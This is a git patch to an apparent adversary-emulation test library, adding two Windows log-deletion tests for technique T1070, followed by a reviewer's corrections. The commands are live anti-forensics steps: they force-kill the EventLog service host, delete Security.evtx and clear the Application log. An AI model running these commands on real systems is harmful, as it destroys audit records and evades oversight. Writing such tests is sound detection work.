From aa0aca3b2ee7a360c1bd5a8415e4714b87ec76d8 Mon Sep 17 00:00:00 2001
From: Andrew Beers
Date: Mon, 11 Nov 2019 23:37:19 -0800
Subject: [PATCH] T1070 delete system logs using power shell (#642)
* stop eventlog service and delete Security.evtx logs
* add tests
* fix format error
* try 2 fix formatting
---
 atomics/T1070/T1070.yaml | 28 +++++++++++++++++++++++++++-
 1 file changed, 27 insertions(+), 1 deletion(-)
diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml
index 12d6de82..60c3a73e 100644
--- a/atomics/T1070/T1070.yaml
+++ b/atomics/T1070/T1070.yaml
@@ -70,4 +70,30 @@ atomic_tests:
 executor:
 name: bash
 command: |
- echo 0> #{log_path}
\ No newline at end of file
+ echo 0> #{log_path}
+
+- name: Delete System Logs Using PowerShell
+ description: |
+ Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: |
+ $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
+ Stop-Process -Id $eventLogId -Force
+ Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
+ cleanup_command: |
+ Start-Service -Name EventLog
+
+- name: Delete System Logs Using Clear-EventLogId
+ description: |
+ Clear event logs using built-in PowerShell commands
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: true
+ command: |
+ Clear-EventLog -logname Application
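Review bot: The second test's name `Delete System Logs Using Clear-EventLogId` does not match the cmdlet its command actually runs (`Clear-EventLog`); rename it to `Delete System Logs Using Clear-EventLog` so the test name can be matched against the command and against detection content written for that cmdlet. In the first test the `description` field holds only detection guidance and has a typo ("couple with"); it should first say what the test does, e.g. `Kills the process hosting the EventLog service and deletes Security.evtx. Recommended Detection: Monitor for use of the Windows event log filepath in PowerShell coupled with delete arguments`. That test's `cleanup_command` (`Start-Service -Name EventLog`) restarts the service but cannot restore the removed Security.evtx, so the description should state that the Security log is not recovered by cleanup. `Stop-Process -Id $eventLogId -Force` terminates the whole service host process returned by the WMI query, which on a default installation is presumably a shared svchost instance, so other services in that process would be stopped too; the commit body says "stop eventlog service", and either the description should say the host process is killed or the test should be checked against `Stop-Service -Name EventLog -Force`. The `atomic_tests` list this hunk extends begins outside the hunk.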